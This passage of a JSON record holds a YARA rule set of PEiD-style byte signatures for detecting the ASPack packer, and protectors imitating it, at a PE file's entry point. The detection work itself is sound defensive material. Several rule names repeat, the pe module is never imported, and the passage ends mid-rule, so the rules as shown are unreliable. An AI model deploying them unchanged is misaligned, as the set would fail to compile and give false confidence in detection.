"key": "yara_detect_aspack",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_Aspack",
"rule": "rule ASPack_v107b_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 75 }\r\n $b = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPAck_1061b: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 75 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 75 01 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 70 05 ?? ?? EB }\r\n $b = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v21_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 00 00 75 15 FE 85 74 7C 43 00 E8 1D 00 00 00 E8 F7 01 00 00 E8 8E 02 00 00 8B 85 75 7C 43 00 03 85 89 7C 43 00 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 3D }\r\n $b = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerAspack_v212_wwwaspackcom: PEiD\r\n{\r\n strings:\r\n $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED CE 3A 44 00 B8 C8 3A 44 00 03 C5 2B 85 B5 3E 44 00 89 85 C1 3E 44 00 80 BD AC 3E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom_additional: PEiD\r\n{\r\n strings:\r\n $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASPack_212_FEUERRADER: PEiD\r\n{\r\n strings:\r\n $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 75 01 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 70 05 00 00 EB 4C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 75 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1083: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E 44 00 0F 85 17 05 00 00 8D 85 D1 50 44 00 50 FF 95 94 51 44 00 89 85 CD 50 44 00 8B F8 8D 9D DE 50 44 00 53 50 FF 95 90 51 44 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 01 FF E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102a_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 ?? ?? 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 }\r\n $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 3D }\r\n $b = { 60 E9 3D 04 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom: PEiD\r\n{\r\n strings:\r\n $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 72 05 00 00 EB 4C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B }\r\n $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v100b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by: PEiD\r\n{\r\n strings:\r\n $a = { 75 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 01 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D B8 03 }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_100b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 92 1A 44 00 B8 8C 1A 44 00 03 C5 2B 85 CD 1D 44 00 89 85 D9 1D 44 00 80 BD C4 1D 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 01 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_additional: PEiD\r\n{\r\n strings:\r\n $a = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 5D 81 ED 3E D9 43 B8 38 03 C5 2B 85 0B DE 43 89 85 17 DE 43 80 BD 01 DE 43 75 15 FE 85 01 DE 43 E8 1D E8 79 02 E8 12 03 8B }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803_additional: PEiD\r\n{\r\n strings:\r\n $a = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_104b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? 00 B8 ?? ?? ?? 00 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? 00 80 BD 08 9D ?? 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_107b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 ?? E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 5D 81 ED CE 3A 44 B8 C8 3A 44 03 C5 2B 85 B5 3E 44 89 85 C1 3E 44 80 BD AC 3E }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_or_10803: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 01 ?? ?? ?? EB 5D BB ED FF FF FF 03 DD 81 }\r\n $b = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 59 }\r\n $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211c: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 ?? ?? ?? EB 09 5D }\r\n $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 01 FF E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_2xwithouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 40 1C 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1061b_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 00 00 75 15 FE 85 6E AD 43 00 E8 1D 00 00 00 E8 73 02 00 00 E8 0A 03 00 00 8B 85 70 AD 43 00 03 85 84 AD 43 00 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804: PEiD\r\n{\r\n strings:\r\n $a = { A8 03 61 75 08 B8 01 C2 0C 68 C3 8B 85 26 04 8D 8D 3B 04 51 50 FF }\r\n $b = { 60 E8 41 06 00 00 EB 41 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_10801_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 ?? 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 00 00 75 15 FE 85 9C 2E 44 00 E8 1D 00 00 00 E8 E4 01 00 00 E8 7A 02 00 00 8B 85 9D 2E 44 00 03 85 B1 2E 44 00 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 41 06 00 00 EB 41 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_103b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED AE 98 43 00 B8 A8 98 43 00 03 C5 2B 85 18 9D 43 00 89 85 24 9D 43 00 80 BD 0E 9D 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b: PEiD\r\n{\r\n strings:\r\n $a = { 75 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n $b = { 60 E8 03 00 00 00 E9 EB 04 